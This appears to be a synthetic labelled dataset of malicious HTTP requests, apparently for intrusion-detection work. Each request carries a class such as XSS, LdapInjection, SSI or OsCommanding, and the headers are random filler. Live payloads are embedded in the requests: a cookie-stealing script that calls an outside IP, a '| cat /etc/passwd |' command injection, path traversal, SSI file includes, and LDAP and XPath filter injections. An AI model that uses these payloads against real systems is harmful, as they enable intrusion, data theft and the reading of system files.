User-Agent: Mozilla/9.3 (compatible; teri; Win98; oHddraiajr; lp7aa)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: HTTP/5.6 186.35.189.146, 4eg3/3.9 77.123.53.205:9864
Transfer-Encoding: compress
Upgrade: eAeah/1.9, srlfi/6.1, 8t24e/5.5
Warning: 496 54.104.249.69 "iplf" "Fri, 06 May 05 07:10:25 GMT"
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 46514
Start - Id: 49261
class: XPathInjection
GET /aN9nrwaiq0de.html?rTqlcfasMsdi=pawpnke%27++++or++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28+++i++++%2B++++j+%2B++k%2B++l++++%2B+1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++%276sSsKh%27++++%3D++%27+++++dhop%27+or&saava=2800&tt6yfta=eeagaor4c&lutaNuhura=39674381&0LQ7yAFv30=eE&xwindow.opencat-betweenebr_4p=20561 HTTP/1.0
Host: www.ssanw.uk:138
Connection: keep-alive
Accept: text/plain;q=0.8, text/*
Accept-Charset: x-mac-cyrillic, windows-1258, x-mac-arabic;q=0.0
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 164.16.9.167
Cookie: _CYgxs=2;eIC1=e2WDLt;Yraon=8;m1gg=ftB;ds8pare74kdsed=6QvN3
Cookie2: $Version="395"
Date: Sat, 12 May 07 01:11:35 CET
ETag: W/"jGu3szARAyYEzvM"
Expect: wtti
From: lqie@4vraituc.com
If-Modified-Since: Wed, 18 Nov 09 03:55:34 GMT
If-Unmodified-Since: Sat, 02 Jan 10 11:49:31 GMT
If-Match: *
If-None-Match: "DMd1uBrJCgw4A5B"
If-Range: Fri, 01 Dec 06 11:45:18 UTC
Max-Forwards: 379
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic bm9UdXk6cTBud210
Authorization: NTLM Z0kwaXNybmFwY0RzZXJ0ZXQ5YWVubnRudGV6b3NtaGxlY2RlZTMxb2NMNw==
Range: 560-83908
Referer: /issec.dll
TE: gzip;q=0.5
Trailer: TE
User-Agent: ivaj/6.1.9
UA-CPU: x86
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 666x0440
Via: 4.5 159.216.184.16, 6.0 164.19.24.113, 3.6 78.61.205.214
Transfer-Encoding: compress
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49261
Start - Id: 44099
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: 169.221.213.138
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.5, deflate
Accept-Language: fI-wnm;q=0.2, dl32o-h, nmtKn-ny, eio8e-e2hioEna;q=0.1, nsM-ortni;q=0.6
Cache-Control: icM='ozhna8'
Client-ip: 236.2.174.53
Cookie: upr9nlhjo=101;s6=eCa%
Cookie2: $Version="7"
Date: Sun, 27 Jan 08 15:07:54 UTC
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: ixam@eaec.uk
If-Modified-Since: Sat, 12 Dec 09 08:37:36 GMT
If-Unmodified-Since: Thu, 27 Jan 05 01:37:53 UTC
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: "l8bdkk8OXX97GR1-UO3"
If-Range: Sat, 04 Apr 09 21:41:55 UTC
Max-Forwards: 3
MIME-Version: 0.4
Pragma: cn=aLwhuimn
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Digest uri=/taeZ9/rhunOa/vnpaf.mspx
Range: 70-
Referer: /aofe7ao/stmnii/ztjehou/tthmSv/5tesssi.jpeg
TE: deflate;q=0.0
Trailer: If-Match
User-Agent: 3tucxaihdd (o-9wes0V; i-HwEdI)
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1501x189
Via: HTTP/3.0 135.149.112.57
Transfer-Encoding: hOUe
Upgrade: unHis2/9.7, sDw/8.7
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44099
Start - Id: 47815
class: XSS
GET /lCscNHiPXcI/fgXp/UupdateTTl407/joeLjnat/VAFnc.mspx?-wherefrom7systemSHLcN=gboot.inito%3E&dEIwthZemaa=tadt1A&lyseOUTmTamBo=KPltanlMg&NLga=96389&ntlxHzm=%3C%21--+--+--%3E%3Cscript++%3E%5Bwindow.open%28%27http%3A%2F%2F206.208.115.156%2Fat.mdb%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E%3C%21--+--+--%3E&E%ua4_RySvnc=76007780&gmRfshkkeieha=r0GNA9-OJXi1&jsqebke6Yl2=46107&or=teiw&en3n=o6dbinhtpassshutdownhavingedt%29titX&eoa=d2etpm HTTP/1.1
Host: www.ngmpaodd2m.net
Connection: keep-alive
Accept: application/postscript;q=0.0, text/*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 203.124.10.83
Cookie: eYoCnhh0heaal=h;fvlhIrdlus=eepoa;yogE3x6JJhavingo=stzO+a;naazrhselac=aDewpvj;idsicmm9he=5220;pcdriinane83e=olc
Cookie2: $Version="0"
Date: Wed, 01 Dec 04 17:53:58 GMT
ETag: W/"OurwtpibD7A0noXC"
Expect: 100-continue
From: imsidtn@unertldl02.de
If-Modified-Since: Fri, 21 Dec 07 16:17:34 CET
If-Unmodified-Since: Sun, 29 Jan 06 08:00:02 CET
If-Match: *
If-None-Match: "mXTKK6G1B_WP-tlrg"
If-Range: *
Max-Forwards: 257
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest uri=/g5nxxi/tLEiado/9dOtoth5/deavlru/bosadp.aspx
Authorization: Digest nonce
Range: 2820-37,-5180,81-
Referer: /nEHejlwh/lseibsa/pasc9n/tqesu8en/u0eo.htm
TE: gzip;q=0.1
Trailer: TE
User-Agent: Mozilla/1.6 (Windows; U; WinNT 4.5; ae-rb; rv:9.2.6) Gecko/48551512
UA-CPU: x86
UA-Disp: 8203,202,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 907x206
Via: 9.2 www.serecet.htm:6, FTP/5.2 www.ysde1o.jpeg, 6.7 www.pn7nmt.tiff
Transfer-Encoding: deflate
Upgrade: sejn/3.6
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 7313347
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47815
Start - Id: 38725
class: LdapInjection
GET /tscmewrvthbi5oifnUta/ddAYrWFx/eVoieW4g5_/RidOSVvm_shutdownKv6sbs/mQDjZPhIsQuvRLRov/n7wTixURAgvC/zor4m4uolUgsSwt67lT.js?aftihhyoacer6=82375798&ohldi7x2dqi7lsy=oyIt&vbscriptwVS.kY=9784021330&tnpep0tmyeian=HiahcH&9ersghd=esDRCEg.&RLvwcatOB=dts&ftpxMy@_4W1o.=oon0%29%28%26%28objectClass++%3D++e1ss*%29 HTTP/1.1
Host: 52.4.166.139
Connection: gttd
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.3
Accept-Language: a4txvu-m, es-es;q=0.2, sohiRiwM-hz, p-hk2s;q=0.0
Cache-Control: max-age=52081
Client-ip: 132.36.253.148
Cookie: 4a7n=oenneaAnhNi ;2hyrc=idseeztir0Hwzo7n2;c8Xsm=s-gb613ALsPE;swvc4fepeR=826927731
Cookie2: $Version="15"
Date: Sat, 05 Jul 08 20:30:57 GMT
ETag: "QB_Ra65Zn9G0M2Xodqta"
Expect: a9ciihis
From: ilrb@h5ihiwr.cz
If-Modified-Since: Tue, 06 Nov 07 15:34:13 GMT
If-Unmodified-Since: Sun, 22 Feb 04 18:08:18 GMT
If-Match: "AEFRn_BfxVQKRWtDbZI"
If-None-Match: *
If-Range: *
Max-Forwards: 0509
MIME-Version: 7.8
Pragma: ggn='wI3hn'
Proxy-Authorization: ztgn ZDrc=dnonaeea
Authorization: NTLM dGNucnJ1NG5scmkzZG5uSGF0bnRldHJBbzh6ZFJkc3llYm1lZXQydw==
Range: 5873-
Referer: http://www.7i9aio.de/oeoo/qdaiRuii/uaelto1r.mpg
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/4.3 (compatible; Konqueror/6.0; Win98; jE3e)
UA-CPU: 68000
UA-Disp: 281,271,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 094x3377
Via: 7.3 79.47.162.18
Transfer-Encoding: deflate
Upgrade: u3thye/4.0, rfee/2.0
Warning: 792 57.164.145.223:2 "o6u6iwaenei" "Thu, 08 Oct 09 12:11:05 UTC"
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 9623929231102541255
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38725
Start - Id: 48304
class: XPathInjection
GET /roimsthZansfwhdng0as.mdb?holirltnm=e.SQCoIDFM&ittottbzipOn9=a%3FeaMt8nkm6udom8&mpszZET28Vhttpsposition=Tn+ HTTP/1.0
Host: www.rd9wesmTu.uk
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: uhAra/o/edsE/child::node()[position()=202]   or    'ia'=   '
Cache-Control: oAi='ye'
Client-ip: 227.188.115.3
Cookie: txuh0=twu2ilm;tqs=>Dse\;uRn=7
Cookie2: $Version="584"
Date: Tue, 01 Dec 09 11:23:54 UTC
ETag: "eerlUYtS7n--gSm11ozn"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Mon, 27 Nov 06 16:52:49 GMT
If-Unmodified-Since: Mon, 29 Nov 04 03:16:40 CET
If-Match: "HX3loz.1Bh8DPH5RPH"
If-None-Match: *
If-Range: *
Max-Forwards: 298
MIME-Version: 6.0
Pragma: edgh='awAsmtn'
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Referer: http://www.0sdOko.ch/eg8edez/sEazaff.sh
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: nnri (dHZ58LHGsF; eqdM6Pa2; sD.aIH.G3)
UA-Disp: 296,6544,16
UA-Pixels: 433x249
Via: 3.9 41.45.211.226, 3.6 113.101.31.141:24, FTP/9.7 www.oodl4nr.js:350
Transfer-Encoding: tsaepc
Upgrade: rkeue/0.5, esr10/3.0, 1eda/2.9, seo/9.6, 7lh/2.5
Warning: 302 12.139.124.62 "qfuhcmikee7d" 
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48304
Start - Id: 37800
class: LdapInjection
GET /1tnnabreN2hrrburyeom/kB/z1rE25H2t0Uxcr7/lUptmpQs5hQNV/btOFN3ixmtoC@0l/9egbfigs1gIshla/sljTJ5hqVIDahpOCz7hO/iR/yWECh_acl43GDi0fCCcG/eCLt9-./SAsdP.pxF.shtml?iiiO0otsle=L&ut2tstb6=7&pelitnepeYaah=%29mochat&6tf=96423&wz=gtu%29%28+++%7C++%28rNd%3D*%29&tlmAnna=0428&Eotd7=4lhe&g8=09584&tnn4zy7mn=e7a+e&atcZIkei2e=11433&agsettt=emlZz&whtpassy1N2DZ=vu4ed&rcNuvsa=wthie8YJcnpix8te HTTP/1.1
Host: 104.114.146.152
Connection: close
Accept: */*;q=0.6
Accept-Charset: windows-1251, windows-1257;q=0.8, iso-8859-7
Accept-Encoding: *;q=0.6
Accept-Language: kbi-tes;q=0.8, tnyb-tu, nwd-aeith;q=0.5, osiddq-otaH
Cache-Control: max-stale=5454
Client-ip: 88.4.33.9
Cookie: ClZCd-il6R=lf;d0=724;uxm2ivi=>samps[ ;KconnectgI=Oftprzn;o7eon=276407136;meniesaxr=l
Cookie2: $Version="7"
Date: Fri, 25 Mar 05 09:21:33 CET
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: 100-continue
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Fri, 14 May 04 02:37:15 GMT
If-Unmodified-Since: Thu, 14 Aug 08 04:35:45 CET
If-Match: *
If-None-Match: "Zcce8fjmgI08heW"
If-Range: Sat, 19 Nov 05 09:15:53 GMT
Max-Forwards: 2
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bXNiYWhpN29ubThuZXJheThvdXNzU0FhZXNhRFdncmx5MG5hZHpubzZyZTA=
Authorization: Digest nc=bC8DDEDe
Range: -1,56487-
Referer: /oe2oo/EwNnlsa/aqsu/ntriaibi.pdf
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: rjyAdWD9A http://www.tiCt.st
UA-CPU: x86
UA-Disp: 654,6999,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 3.6 130.129.196.38, 0.5 230.229.180.179, FTP/1.4 www.toes.css
Transfer-Encoding: deflate
Upgrade: rasu/0.8, teies/0.4, nSn4/5.5, rceyaa/2.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 51540025219516295727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37800
Start - Id: 40449
class: SSI
GET /3RrX/ivBtERw/tmpN8UhttpsCFb/SsexecvconnectinputXYNMz/pR0Np6tJWvhzW4DI1Z/eXGir2j8GM8/Pdrop8ezXR3/uha1nhktzaxc/n_xZ/dImdyepte/d0Cohnanhtcbasa65se.jpeg?e-boot.ini@Y=qdlduh+%27euwgziK&SyifceneeRch6=cI5zf.&inlcrrdIhapOair=%3C%21--+++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&lfarlsNlear=fkB%409dg7&lerOvu=6532516&eo4gt=6806636&allxzIKiE=728338&tinput.ytQoHx=648169&nea6cEc=hht&obionNOslapo=eEBvtyn&8noowcEni6a=h&7chnirtie=adminie&t5=chs%3D HTTP/1.1
Host: www.erexhb1.de:0639
Connection: keep-alive
Accept: audio/basic;q=0.9, application/postscript;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: anitmr-2ahhheha, f-a;q=0.9, z5u8-rd, ae-oeswa9ww, onsohwCr-4qagn;q=0.9
Cache-Control: no-store
Client-ip: 95.206.188.178
Cookie: ikry71rli=peoma3eEcf4leb
Cookie2: $Version="879"
Date: Sun, 19 Mar 06 14:59:30 UTC
ETag: "63htvQ03lV1P1aqZu@3F"
Expect: 100-continue
If-Modified-Since: Thu, 11 Dec 08 10:35:25 GMT
If-Unmodified-Since: Wed, 20 Sep 06 05:28:12 CET
If-Match: *
If-None-Match: "Rku@O.tZCM7jQAR"
If-Range: "dRvIvZRddlTCwMD7U"
Max-Forwards: 3
MIME-Version: 3.0
Pragma: atx='wnt5'
Proxy-Authorization: 2eg8q 4ltgtAr9=na5Ilsmg
Authorization: NTLM aW9yaWF4ZTN2UXptdHFobHNhaWZ0YW5hbm5lSWwwZHdyd2NwZg==
Range: 648391-0593,082-86156,297927-83
Referer: /edaoteet/Lsdeetjo/ordnr/uobain/Ueve.swf
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/2.5 (Windows; U; WinNT 0.9; al-cb; rv:8.7.6) Gecko/65773214
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4401x4707
Via: 1.3 www.arssodL.css, HTTP/0.8 83.177.0.21, sgi/4.7 www.ht4ei.png
Transfer-Encoding: deflate
Upgrade: Fet/1.1, nsHe/6.2
Warning: 037 www.zncew.jpg "u3loce3odp3oeC" 
X-Forwarded-For: 211.36.21.124
X-Serial-Number: 9011770
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 40449
Start - Id: 43359
class: OsCommanding
GET /Uw/e54O/insertQ/hOwqr4nn4pI/ir8oretret2nihMgo/4p/Px.htm?Yoica8rt=iRrUBQiipE&essas=74&Aom=%409c%29t%3Asieawindow.opencihUo&ohwghmctc7a=%7C+++cat+%2Fetc%2Fpasswd%7C&_fzhBWIiJb=qfe&qy1hh52oi=660296&judEsne0Ntuie=eyel&35ltdnnrza9eofa=n.E2T6p&Hc6pe6alv=3084&ilctowK=0&go9ikst=bnYsLtenropls8hhd&e0dhoTsxuajl=wi HTTP/1.0
Host: 125.46.25.241
Connection: keep-alive
Accept: text/xml;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: Otpj-liaSteN7;q=0.7, edsez-pter, r-tcaehnNh;q=0.2
Cache-Control: no-cache
Client-ip: 156.10.128.233
Cookie: 5aynsmdlr=sdemevot;fsAe=mnlTe-tdl
Cookie2: $Version="167"
Date: Sun, 02 Oct 05 21:21:56 UTC
ETag: W/"SCFxXxDdEo-NGRp"
Expect: seetl=mqbf
From: vpsly@coiheDy.uk
If-Modified-Since: Thu, 30 Apr 09 12:48:43 UTC
If-Unmodified-Since: Fri, 25 May 07 23:20:49 GMT
If-Match: *
If-None-Match: "p2@jPP62BlQdFRMkN2"
If-Range: "a4yOT5J1bykxlmQ"
Max-Forwards: 468
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: s706we eeedsr=aacN
Range: 9-
Referer: http://rgGuwe.ch/ttoo/een9.avi
TE: trailers
Trailer: If-Range
User-Agent: EhNtite/8.5
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 331x628
Via: 9.6 www.rTan.shtml:29
Transfer-Encoding: identity
Upgrade: gso/5.0, rNa5/4.2, pdodni/6.9, hdrrTE/2.2
Warning: 363 www.igd5n.css "nqcasc4" "Sun, 08 Jun 08 05:03:15 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 3255845056436088473
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43359
Start - Id: 39453
class: SSI
GET /temhcryTndlt/haeistrrfme98q/gefl/XjwyYTcmdMxp_e8c1/nmUUXeqx-I/cVfSrj0rsvjk/hnD8nayie/eS0dy/_en4ytupdatevbscript@hEJjD.jsp?ojaop9asosoa4eR=933&Orvm3iBsnmieleE=uKxObkVPWBE4&imzt0taErbrn=589998434&rtottsE=nmVi8S1&lccilmta=2080565&heSkOtraORsne=8&P21@ZI=%3C%21--%23email+fromhost%3D%22www.emao7D.com%22+tohost%3D%22mailbox.0ad5.com%22+message%3D%22oskba6+eitxnlt+5hO+5nw%22+fromaddress%3D%22tfioaT.com%22+toaddress%3D%22Eejt.nacN.com%22+subject%3D%22n5%22+sender%3D%222Fk.com%22+replyto%3D%22iaeyahe.com%22+cc%3D%22mha%22+inreplyto%3D%22evil+lyb+et%22+id%3D%22Ccctqmail%22+--%3E&cha3xnmm3ei=melusstdin&th9hnohydi0=7824&wozd6uilerodtt=erfeestepcwkauprt&deeubnAeo=bhB&cocNertd0oueA7f=yvt&suntVm=43&oeSTwle2msgmm=n-0gu&ydmurimcH=0963 HTTP/1.0
Host: 195.250.130.233
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: iso-8859-5;q=0.4, euc-jp, euc-jp;q=0.8, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=3231
Client-ip: 179.178.240.191
Cookie: RW5@V@DxY=aech
Cookie2: $Version="52"
Date: Fri, 13 Jun 08 13:11:55 GMT
ETag: W/"OsLV-aEWwosxLq8"
Expect: 100-continue
From: antap@dxtrNr.uk
If-Modified-Since: Sat, 23 Oct 04 01:14:53 UTC
If-Unmodified-Since: Fri, 12 Aug 05 19:01:22 UTC
If-Match: *
If-None-Match: "JWlT5x3vHYCnrL-BBY"
If-Range: "fW.vLOs.gHOGsvi78p5"
Max-Forwards: 9417
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic NHN2YUI6a290bnNw
Authorization: NTLM dGVhbmloTHJvZWZpbjNlb1RlZGZvM2lhcmExdGZ0c2ExRXJuc2NoM3Ji
Range: 993-
Referer: http://ptrtiere.net/UryeV/woiyrep/nDce9.bin
TE: trailers,trailers
Trailer: Warning
User-Agent: tews8ka (afoHmvYyZ6; kBIQ1j)
UA-CPU: 68000
UA-Disp: 677,8714,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 859x7784
Via: srH3tn/7.4 160.214.66.136
Transfer-Encoding: gzip
Upgrade: nSr/8.2, bkiiH/4.4, thru4/6.0
Warning: 266 www.ntod.js "olcerhu3aeyrr0neri" "Fri, 27 Oct 06 16:23:27 CET"
X-Forwarded-For: 109.38.196.61
X-Serial-Number: 298841177786
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39453
Start - Id: 37194
class: LdapInjection
GET /oirte/tivrsszegontlda/bAIJn/rtqw0TkEho.css?ncuniehoti=j%40ydH&lh7=m7m%3Fme&0a9iatsum1zbo=%27bgsound%3ElshnsZs&tnahrdsad=rNCBoU4E&aua=tK9.bRdUwlRJ&ekdeAxiYhgju=b6jesr4f1ornwft2&dcxsdhjftealr=411&e0aehpntyuee3=cNseqa&hsw7E=7&ete=10341218&.0oJIWJ=iyUdt8cmu&esopknsSi8oa=%29+%28+++%7C+++%28++cn%3D*o+++%27brien*++++%29%28mail+++%3D*o++%27brien*++%29++&NNoWfQscriptr3eQb=2&aozueOt=675974476&ngh4dhereEalc6=sexp_adi HTTP/1.1
Host: 13.161.136.135
Connection: keep-alive
Accept: application/*, video/quicktime
Accept-Charset: *;q=0.6
Accept-Encoding: compress;q=0.6
Accept-Language: cit-an;q=0.1, eo-cq, hE-s, nute6-yiitshi;q=0.3
Cache-Control: no-cache
Client-ip: 230.103.128.65
Cookie: nsinet55O=h5vcNheG
Cookie2: $Version="6"
Date: Fri, 27 Aug 04 22:36:23 UTC
ETag: "gWkihjapRYwi3oCzZ"
Expect: 100-continue
From: ssnh@aamhzelr.net
If-Modified-Since: Sun, 29 Nov 09 20:31:08 GMT
If-Unmodified-Since: Fri, 14 Sep 07 11:03:00 CET
If-Match: "QHkl6BtaIA.9A8Naa9Y"
If-None-Match: *
If-Range: Wed, 14 Sep 05 03:31:26 UTC
Max-Forwards: 481
MIME-Version: 2.5
Pragma: no-cache
Authorization: NTLM ZGxibnV5M2phb29QZWE0aGE5MkF2ZXRpMjNteWEyb3RtZ21l
Range: 605-286224
Referer: http://www.j3ehexo.fr/urerty/anoD9zdn/sistirR/sstsGhgm/etai.pl
TE: trailers,chunked,chunked
Trailer: From
User-Agent: Mozilla/8.7 (X11; U; Solaris 4.0; bs-in; rv:2.9.5) Gecko/10153048
UA-CPU: 68000
UA-OS: Win98
Via: 2Irhs/1.2 92.36.242.48:85
Transfer-Encoding: daem
Upgrade: resPct/8.2
Warning: 210 www.aenolsu.gif "shzStqziheorenrrf" 
X-Forwarded-For: 200.50.212.253
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37194
Start - Id: 46015
class: PathTransversal
POST /bhpisbcWlb/9sf.jpeg? HTTP/1.1
Content-Length: 253
Content-Language: iGk,7kaUwyia,z90
Content-Encoding: gzip
Content-MD5: bGU0c2RpZWxtbHVUbXl1dw==
Content-Type: application/x-www-form-urlencoded
Host: www.eps0ifreo.org
Connection: 010ate1t
Accept: text/plain;q=0.6, audio/basic, application/x-tar;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: srra-u1Eah4, a9ilth-Atadij
Cache-Control: no-transform
Client-ip: 215.168.122.168
Cookie: egnnsuHsrqosa=568765;Mhhs4h=../../../../../../../../../usr/yo.bat
Cookie2: $Version="79"
Date: Sat, 03 Jul 04 01:06:09 UTC
Expect: 100-continue
If-Modified-Since: Sun, 18 Apr 10 19:14:33 UTC
If-Unmodified-Since: Sun, 08 Jul 07 20:31:09 UTC
If-Match: *
If-Range: Tue, 21 Nov 06 16:17:27 GMT
Max-Forwards: 97
Proxy-Authorization: Reui iOuai=meriTAeb
Authorization: hfIvnE Lmo2eenp=ioUgiAm
Referer: http://fflvitme.gov/edsee.avi
Trailer: Referer
User-Agent: ds2t2 (xzLzsHF; scMdBQxVNR; boV8Vvco; nVuWE0l)
Transfer-Encoding: deflate
Upgrade: wiiemb/3.3, ehnm/9.8, La7auu/5.4, s5s/8.9
Warning: 274 www.f69it.png "tte3Nhrad7oh9ljEo7r" 
~~~~~: ~~~~~~~~~~~~~~

Cttsnl=<servicese&B3S.3t=/isAstyletmshutdowntai73&91y0c-9EwBJ=483491&QriKFboot.iniGfZj1=;3&processing-instructionNVaYIb2Au2=8541015&tpyAyjhhc6ai=hip&BtsdcyGtoheAHi=s/&&awtr=7R&ajvstozdair=rTon5nalftcyhjE3al&mtitsce=nldi+de&XXchildH=tneounhso

End - Id: 46015
Start - Id: 39745
class: SSI
GET /6yb/EwbemnneeaEEpbmvm/ioca1nl5eh/tfZg-NOJ/oo8MjBirohrcdt/hhYaG@ZwIls8pXV2lOm/4@X21xo_FO-rSiN0b5kU/nTQ0GXUWg6_KQU.exe?Z-QPwCw2=%3C%21--+++++%23include+++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++--%3E&recup5rboiuru=36210498&yd6co=49eojuW4EM8&drA2s2nfTtu=0251&jeor32wofe=bRCC&76=%28shreplacen25eleo%26&1MAsn_1lSGl=ttdelete%29sisR&behausagyhqeox=ehse4hspe+urdC&no=eecdarxiurNcbr HTTP/1.0
Host: www.coAtea.st
Connection: reean
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nsiese-f7yyf5
Cache-Control: min-fresh=8
Client-ip: 10.65.26.121
Cookie: k6h1ggroup by=eII2;ca=tizoxi0ieoe2emP8;oiesyotlr=a4a;svphegosl=rdnot3eihRTre
Cookie2: $Version="7"
Date: Wed, 18 Aug 04 21:00:00 GMT
ETag: W/"gziqNRWgeKEuw_Gs"
Expect: td7ebjge
From: n4tbla@ol8e.st
If-Modified-Since: Thu, 26 Jul 07 16:27:46 CET
If-Unmodified-Since: Thu, 16 Oct 08 02:05:42 GMT
If-Match: "3y6Fcc-W@ilXEcQNbt14"
If-None-Match: "WS-AYxw8TAVXttq"
If-Range: *
Max-Forwards: 5
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: nyks7 tHmRb8=vgc3
Range: -343,5-1
Referer: http://1tysehlz.fr/ntarim.jpg
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: Ett3eeplol (a-z_6.y; aBwwYB; xCpJsSdGf)
UA-CPU: Sparc
UA-Disp: 1946,7252,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 930x2188
Via: jbrs/4.9 151.201.52.185, 7.9 www.Genen.jpeg
Transfer-Encoding: identity
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 177.241.180.13
X-Serial-Number: 43717297958345
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39745
Start - Id: 37206
class: LdapInjection
GET /y5VcApVxSbmocha2/3iseuLus/ro1SEY2O5N3OTEQ@sM/hepnsengreet1sOo/Nroetmqr0zt7ee/rep9e/0e/bllnohznn/Ngn.js?naheTt=3223%29%28%26%28objectClass%3DNa8a%29%28%7C%28sn+%3D+++eo%29%28cn%3Dlnoa+++++J*%29%29 HTTP/1.1
Host: 161.47.108.29
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 187.25.210.159
Cookie: swFvosbesmm=8taoercpsmeeit;dkc=0410525
Cookie2: $Version="43"
Date: Thu, 15 May 08 15:47:17 GMT
ETag: W/"nGU3RVy8tOKIK4L"
Expect: 100-continue
From: ejgouV@q9tOejr.uk
If-Modified-Since: Thu, 04 Sep 08 19:47:21 GMT
If-Unmodified-Since: Fri, 09 Nov 07 20:17:20 GMT
If-Match: *
If-None-Match: *
If-Range: "6AgJ1N6sjeGr0fdcE_8"
Max-Forwards: 4
MIME-Version: 2.5
Pragma: uoe='iueauypg'
Proxy-Authorization: Basic ZHdiZFdlOm9kaWdlVWF0
Authorization: NTLM Zm51aHJlbGNraG9hbmduMXNjZkVhZXJuZVJpeXNPdWVmdE9ibmxycUJ0
Range: 605-286224
Referer: /gbet9/tqli2.tiff
TE: deflate,gzip,chunked;q=0.9
Trailer: Trailer
User-Agent: Mozilla/9.5 (Windows; U; Win98 2.0; nb-er; rv:5.7.5) Gecko/03594196
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x8291
Via: jtt1/5.0 www.oidn.htm, HTTP/7.4 www.hnrduhow.png:3247
